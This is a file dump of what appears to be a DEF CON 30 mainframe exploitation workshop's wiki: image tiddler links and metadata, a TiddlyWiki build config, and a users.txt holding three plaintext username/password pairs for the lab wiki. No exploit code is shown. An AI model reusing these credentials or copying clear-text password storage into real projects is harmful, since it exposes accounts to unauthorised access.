-------------------------------------------------------------------------------- 1 | created: 20220805150805414 2 | modified: 20220805150805414 3 | title: denied.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/editor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/editor.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/editor.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805062724307 2 | modified: 20220805062724307 3 | title: editor.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/emem.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/emem.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/emem.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805063509721 2 | modified: 20220805063509721 3 | title: emem.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/exploitshell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/exploitshell.png -------------------------------------------------------------------------------- 
/wiki/tiddlywiki/mywiki/tiddlers/exploitshell.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805231158829 2 | modified: 20220805231158829 3 | title: exploitshell.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/exploitxor.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/exploitxor.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/exploitxor.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805231030478 2 | modified: 20220805231030478 3 | title: exploitxor.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/hexhiighlight.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/hexhiighlight.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/hexhiighlight.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805144631082 2 | modified: 20220805144631082 3 | title: hexhiighlight.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/image.png 
-------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/image.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805063252096 2 | modified: 20220805063252096 3 | title: image.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/image_edit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/image_edit.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/image_edit.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805062632504 2 | modified: 20220805062632504 3 | title: image_edit.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/joblog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/joblog.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/joblog.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805231911859 2 | modified: 20220805231911859 3 | title: joblog.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/lgtbmemory.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/lgtbmemory.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/lgtbmemory.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805065334440 2 | modified: 20220805065334440 3 | title: lgtbmemory.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/linewtosml.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/linewtosml.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/linewtosml.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805211206949 2 | modified: 20220805211206949 3 | title: linewtosml.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/neowhiterabbit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/neowhiterabbit.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/neowhiterabbit.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805070609267 2 | modified: 20220805070609267 3 | title: neowhiterabbit.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/newwtosml.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/newwtosml.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/newwtosml.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805225539027 2 | modified: 20220805225539027 3 | title: newwtosml.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/opentstac0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/opentstac0.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/opentstac0.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805151219640 2 | modified: 20220805151219640 3 | title: opentstac0.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/privesc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/privesc.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/privesc.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805162837947 2 | modified: 20220805162837947 3 | title: privesc.png 4 | type: image/png -------------------------------------------------------------------------------- 
/wiki/tiddlywiki/mywiki/tiddlers/putv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/putv.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/putv.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805064347820 2 | modified: 20220805064347820 3 | title: putv.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/rceoverflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/rceoverflow.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/rceoverflow.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805231534738 2 | modified: 20220805231534738 3 | title: rceoverflow.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/shellcodejcl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/shellcodejcl.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/shellcodejcl.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805150001638 2 | modified: 20220805150001638 3 | title: shellcodejcl.png 4 | type: image/png 
-------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/thebytes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/thebytes.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/thebytes.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805222223285 2 | modified: 20220805222223285 3 | title: thebytes.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/title.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/title.jpg -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/title.jpg.meta: -------------------------------------------------------------------------------- 1 | created: 20220804225613406 2 | modified: 20220804225613406 3 | title: title.jpg 4 | type: image/jpeg -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/wallpaper.3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/wallpaper.3.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/wallpaper.3.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801071846139 2 | modified: 20220801071846139 3 | title: 
wallpaper.3.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/whiterabbit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/whiterabbit.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/whiterabbit.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805162956628 2 | modified: 20220805162956628 3 | title: whiterabbit.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/youdidit.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/youdidit.jpg -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/youdidit.jpg.meta: -------------------------------------------------------------------------------- 1 | created: 20220804225517697 2 | modified: 20220804225517697 3 | title: youdidit.jpg 4 | type: image/jpeg -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlywiki.info: -------------------------------------------------------------------------------- 1 | { 2 | "description": "Basic client-server edition", 3 | "plugins": [ 4 | "tiddlywiki/tiddlyweb", 5 | "tiddlywiki/filesystem", 6 | "tiddlywiki/highlight" 7 | ], 8 | "themes": [ 9 | "tiddlywiki/vanilla", 10 | "tiddlywiki/snowwhite" 11 | ], 12 | "build": { 13 | "index": [ 14 | "--rendertiddler", 15 | "$:/plugins/tiddlywiki/tiddlyweb/save/offline", 16 | "index.html", 17 | "text/plain" 18 | ], 
19 | "static": [ 20 | "--rendertiddler", 21 | "$:/core/templates/static.template.html", 22 | "static.html", 23 | "text/plain", 24 | "--rendertiddler", 25 | "$:/core/templates/alltiddlers.template.html", 26 | "alltiddlers.html", 27 | "text/plain", 28 | "--rendertiddlers", 29 | "[!is[system]]", 30 | "$:/core/templates/static.tiddler.html", 31 | "static", 32 | "text/plain", 33 | "--rendertiddler", 34 | "$:/core/templates/static.template.css", 35 | "static/static.css", 36 | "text/plain" 37 | ] 38 | } 39 | } -------------------------------------------------------------------------------- /wiki/users.txt: -------------------------------------------------------------------------------- 1 | username,password 2 | defcon,class! 3 | jake,Unhackable 4 | phil,Mainframes4lyfe --------------------------------------------------------------------------------